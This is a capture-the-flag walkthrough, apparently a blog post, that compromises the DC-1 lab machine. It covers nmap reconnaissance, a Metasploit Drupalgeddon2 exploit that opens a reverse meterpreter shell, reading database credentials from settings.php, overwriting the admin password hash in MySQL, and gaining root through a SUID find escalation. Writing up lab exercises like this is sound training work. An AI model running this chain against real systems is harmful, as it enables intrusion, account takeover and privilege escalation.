3. DC-1 target machine

Author: 循环不计次 | Published 2022-10-26 15:28

    [offensive-security] 3. DC-1 target machine

    I. Gathering information about the target

    1. Known information:

    • IP: 192.168.245.193

    2. Information gathered:

    • nmap scan of the open services
    ┌──(root㉿0xlo0p)-[/home/lo0p]
    └─# nmap -sV -A 192.168.245.193
    Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-26 14:45 CST
    Nmap scan report for 192.168.245.193
    Host is up (0.34s latency).
    Not shown: 997 closed tcp ports (reset)
    PORT    STATE SERVICE VERSION
    22/tcp  open  ssh     OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
    | ssh-hostkey: 
    |   1024 c4:d6:59:e6:77:4c:22:7a:96:16:60:67:8b:42:48:8f (DSA)
    |   2048 11:82:fe:53:4e:dc:5b:32:7f:44:64:82:75:7d:d0:a0 (RSA)
    |_  256 3d:aa:98:5c:87:af:ea:84:b8:23:68:8d:b9:05:5f:d8 (ECDSA)
    80/tcp  open  http    Apache httpd 2.2.22 ((Debian))
    | http-robots.txt: 36 disallowed entries (15 shown)
    | /includes/ /misc/ /modules/ /profiles/ /scripts/ 
    | /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
    | /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
    |_/LICENSE.txt /MAINTAINERS.txt
    |_http-generator: Drupal 7 (http://drupal.org)
    |_http-title: Welcome to Drupal Site | Drupal Site
    111/tcp open  rpcbind 2-4 (RPC #100000)
    | rpcinfo: 
    |   program version    port/proto  service
    |   100000  2,3,4        111/tcp   rpcbind
    |   100000  2,3,4        111/udp   rpcbind
    |   100000  3,4          111/tcp6  rpcbind
    |   100000  3,4          111/udp6  rpcbind
    |   100024  1          50550/tcp6  status
    |   100024  1          55270/udp   status
    |   100024  1          55271/udp6  status
    |_  100024  1          57092/tcp   status
    No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
    TCP/IP fingerprint:
    OS:SCAN(V=7.92%E=4%D=10/26%OT=22%CT=1%CU=31332%PV=Y%DS=2%DC=T%G=Y%TM=6358D7
    OS:C6%P=aarch64-unknown-linux-gnu)SEQ(SP=105%GCD=1%ISR=10A%TI=Z%II=I%TS=8)S
    OS:EQ(SP=106%GCD=1%ISR=109%TI=Z%TS=8)OPS(O1=M54EST11NW4%O2=M54EST11NW4%O3=M
    OS:54ENNT11NW4%O4=M54EST11NW4%O5=M54EST11NW4%O6=M54EST11)WIN(W1=3890%W2=389
    OS:0%W3=3890%W4=3890%W5=3890%W6=3890)ECN(R=Y%DF=Y%T=40%W=3908%O=M54ENNSNW4%
    OS:CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=N)T5(R
    OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=N)T7(R=N)U1(R=Y%DF=N%T=40
    OS:%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
    
    Network Distance: 2 hops
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
    
    TRACEROUTE (using port 256/tcp)
    HOP RTT       ADDRESS
    1   429.93 ms 192.168.49.1
    2   430.05 ms 192.168.245.193
    
    OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 82.49 seconds
    

    First, look at port 80: it is a CMS site running Drupal 7. Next, check in msf whether there are exploitable vulnerabilities for it.

    • Getting a shell on Drupal 7 with MSF
    ┌──(lo0p㉿0xlo0p)-[~]
    └─$ msfconsole                                        
    
           =[ metasploit v6.1.27-dev                          ]
    + -- --=[ 2196 exploits - 1162 auxiliary - 400 post       ]
    + -- --=[ 596 payloads - 45 encoders - 10 nops            ]
    + -- --=[ 9 evasion                                       ]
    
    Metasploit tip: You can upgrade a shell to a Meterpreter 
    session on many platforms using sessions -u 
    <session_id>
    
    msf6 > search Drupal
    
    Matching Modules
    ================
    
       #  Name                                           Disclosure Date  Rank       Check  Description
       -  ----                                           ---------------  ----       -----  -----------
       0  exploit/unix/webapp/drupal_coder_exec          2016-07-13       excellent  Yes    Drupal CODER Module Remote Command Execution
       1  exploit/unix/webapp/drupal_drupalgeddon2       2018-03-28       excellent  Yes    Drupal Drupalgeddon 2 Forms API Property Injection
       2  exploit/multi/http/drupal_drupageddon          2014-10-15       excellent  No     Drupal HTTP Parameter Key/Value SQL Injection
       3  auxiliary/gather/drupal_openid_xxe             2012-10-17       normal     Yes    Drupal OpenID External Entity Injection
       4  exploit/unix/webapp/drupal_restws_exec         2016-07-13       excellent  Yes    Drupal RESTWS Module Remote PHP Code Execution
       5  exploit/unix/webapp/drupal_restws_unserialize  2019-02-20       normal     Yes    Drupal RESTful Web Services unserialize() RCE
       6  auxiliary/scanner/http/drupal_views_user_enum  2010-07-02       normal     Yes    Drupal Views Module Users Enumeration
       7  exploit/unix/webapp/php_xmlrpc_eval            2005-06-29       excellent  Yes    PHP XML-RPC Arbitrary Code Execution
    

    There are plenty of options; here I tested the 2018 Forms API property injection vulnerability (drupal_drupalgeddon2).

    msf6 > use exploit/unix/webapp/drupal_drupalgeddon2
    [*] No payload configured, defaulting to php/meterpreter/reverse_tcp
    msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set rhosts 192.168.245.193
    rhosts => 192.168.245.193
    msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set lhost 192.168.49.245
    lhost => 192.168.49.245
    msf6 exploit(unix/webapp/drupal_drupalgeddon2) > run
    
    [*] Started reverse TCP handler on 192.168.49.245:4444 
    [*] Running automatic check ("set AutoCheck false" to disable)
    [!] The service is running, but could not be validated.
    [*] Sending stage (39282 bytes) to 192.168.245.193
    [*] Meterpreter session 1 opened (192.168.49.245:4444 -> 192.168.245.193:40926 ) at 2022-10-26 14:52:33 +0800
    
    meterpreter > shell
    Process 3438 created.
    Channel 0 created.
    ls    
    COPYRIGHT.txt
    INSTALL.mysql.txt
    INSTALL.pgsql.txt
    INSTALL.sqlite.txt
    INSTALL.txt
    LICENSE.txt
    MAINTAINERS.txt
    README.txt
    UPGRADE.txt
    authorize.php
    cron.php
    flag1.txt
    includes
    index.php
    install.php
    misc
    modules
    profiles
    robots.txt
    scripts
    sites
    themes
    update.php
    web.config
    xmlrpc.php
    cat flag1.txt
    Every good CMS needs a config file - and so do you.
    
    

    After entering the shell, the current user is www-data, a low-privilege account. The current directory contains flag1.txt, which hints that we should look for this CMS site's configuration file, so I searched Baidu:

    Directory structure of a default Drupal installation - Tencent Cloud Developer Community (tencent.com)

    The configuration file is sites/default/settings.php; the important part is excerpted below:

    cat settings.php
    <?php
    
    /**
     *
     * flag2
     * Brute force and dictionary attacks aren't the
     * only ways to gain access (and you WILL need access).
     * What can you do with these credentials?
     *
     */
    
    $databases = array (
      'default' => 
      array (
        'default' => 
        array (
          'database' => 'drupaldb',
          'username' => 'dbuser',
          'password' => 'R0ck3t',
          'host' => 'localhost',
          'port' => '',
          'driver' => 'mysql',
          'prefix' => '',
        ),
      ),
    );
    
    /**
    

    This gives us the database name, user and password, plus the second flag hint, so let's go into the database and take a look.

    python -c 'import pty;pty.spawn("/bin/bash")'         
    www-data@DC-1:/var/www$ mysql -u dbuser -pR0ck3t
    mysql -u dbuser -pR0ck3t
    Welcome to the MySQL monitor.  Commands end with ; or \g.
    Your MySQL connection id is 79
    Server version: 5.5.60-0+deb7u1 (Debian)
    
    Copyright (c) 2000, 2018, Oracle and/or its affiliates. All rights reserved.
    
    Oracle is a registered trademark of Oracle Corporation and/or its
    affiliates. Other names may be trademarks of their respective
    owners.
    
    Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
    
    mysql> use R0ck3t
    use R0ck3t
    ERROR 1044 (42000): Access denied for user 'dbuser'@'localhost' to database 'R0ck3t'
    mysql> use drupaldb
    use drupaldb
    Reading table information for completion of table and column names
    You can turn off this feature to get a quicker startup with -A
    
    Database changed
    mysql> show tables;
    show tables;
    +-----------------------------+
    | Tables_in_drupaldb          |
    +-----------------------------+
    | users                       |
    | users_roles                 |
    | variable                    |
    | views_display               |
    | views_view                  |
    | watchdog                    |
    +-----------------------------+
    80 rows in set (0.00 sec)
    
    mysql> select * from users;
    select * from users;
    +-----+-------+---------------------------------------------------------+-------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-------------------+------+
    | uid | name  | pass                                                    | mail              | theme | signature | signature_format | created    | access     | login      | status | timezone            | language | picture | init              | data |
    +-----+-------+---------------------------------------------------------+-------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-------------------+------+
    |   0 |       |                                                         |                   |       |           | NULL             |          0 |          0 |          0 |      0 | NULL                |          |       0 |                   | NULL |
    |   1 | admin | $S$DvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR | admin@example.com |       |           | NULL             | 1550581826 | 1550583852 | 1550582362 |      1 | Australia/Melbourne |          |       0 | admin@example.com | b:0; |
    |   2 | Fred  | $S$DWGrxef6.D0cwB5Ts.GlnLw15chRRWH2s1R3QBwC0EkvBQ/9TCGg | fred@example.org  |       |           | filtered_html    | 1550581952 | 1550582225 | 1550582225 |      1 | Australia/Melbourne |          |       0 | fred@example.org  | b:0; |
    +-----+-------+---------------------------------------------------------+-------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-------------------+------+
    3 rows in set (0.00 sec)
    

    Note: first use python to spawn an interactive TTY shell (the pty.spawn line above); otherwise the mysql client cannot be used from the meterpreter shell.

    The query gives us the site's users table, but the passwords are stored as hashes, not in plaintext. At this point, think back to the flag2 hint above:

    Brute force and dictionary attacks aren't the only ways to gain access (and you WILL need access). What can you do with these credentials?

    The hint says brute-forcing is not necessarily required, so let's search Baidu for how Drupal hashes its passwords:

    How to reset a Drupal 7 user password - 雨滴米 - ITeye blog

    www-data@DC-1:/var/www$ php scripts/password-hash.sh "123456"
    php scripts/password-hash.sh "123456"
    
    password: 123456                hash: $S$D56GLmbar5i7NKVMZIoZdTFCRKejES4RMKp311ymjs6/0T4BOtoA
    

    With the new hash in hand, we go into mysql and update the admin row, after which we can log in:

    mysql> update users set pass='$S$D56GLmbar5i7NKVMZIoZdTFCRKejES4RMKp311ymjs6/0T4BOtoA' where name='admin';
    <dTFCRKejES4RMKp311ymjs6/0T4BOtoA' where name='admin';                       
    Query OK, 1 row affected (0.01 sec)
    Rows matched: 1  Changed: 1  Warnings: 0
    

    After the change we go to the web interface, log in as admin, and find the flag3 hint:

    Special PERMS will help FIND the passwd - but you'll need to -exec that command to work out how to get what's in the shadow.

    The hint is quite explicit, so we look for executables with the SUID bit set:

    www-data@DC-1:/var/www$ find / -perm -4000 2>/dev/null
    find / -perm -4000 2>/dev/null
    /bin/mount
    /bin/ping
    /bin/su
    /bin/ping6
    /bin/umount
    /usr/bin/at
    /usr/bin/chsh
    /usr/bin/passwd
    /usr/bin/newgrp
    /usr/bin/chfn
    /usr/bin/gpasswd
    /usr/bin/procmail
    /usr/bin/find
    /usr/sbin/exim4
    /usr/lib/pt_chown
    /usr/lib/openssh/ssh-keysign
    /usr/lib/eject/dmcrypt-get-device
    /usr/lib/dbus-1.0/dbus-daemon-launch-helper
    /sbin/mount.nfs
    

    The find command stands out immediately; https://gtfobins.github.io/gtfobins/find/ shows how it can be abused, and with it we escalate to root, obtaining the first key and the flag4 hint:

    www-data@DC-1:/var/www$ find . -exec /bin/sh \; -quit
    find . -exec /bin/sh \; -quit
    # whoami
    whoami
    root
    # cd /home
    cd /home
    # ls
    ls
    flag4  local.txt
    # cat local.txt
    cat local.txt
    a68de45775de2a3c662c669556630844
    # cd flag4
    cd flag4
    # ls  
    ls
    flag4.txt
    # cat flag4.txt
    cat flag4.txt
    Can you use this same method to find or access the flag in root?
    
    Probably. But perhaps it's not that easy.  Or maybe it is?
    

    Let's look in root's home directory:

    # cd /root
    cd /root
    # ls
    ls
    proof.txt  thefinalflag.txt
    # cat thefinalflag.txt
    cat thefinalflag.txt
    Well done!!!!
    
    Hopefully you've enjoyed this and learned some new skills.
    
    You can let me know what you thought of this little journey
    by contacting me via Twitter - @DCAU7
    # cat proof.txt
    cat proof.txt
    f06c05f682238e5ea97034108a9caa74
    

    Done.

    Original link: https://www.haomeiwen.com/subject/psgazrtx.html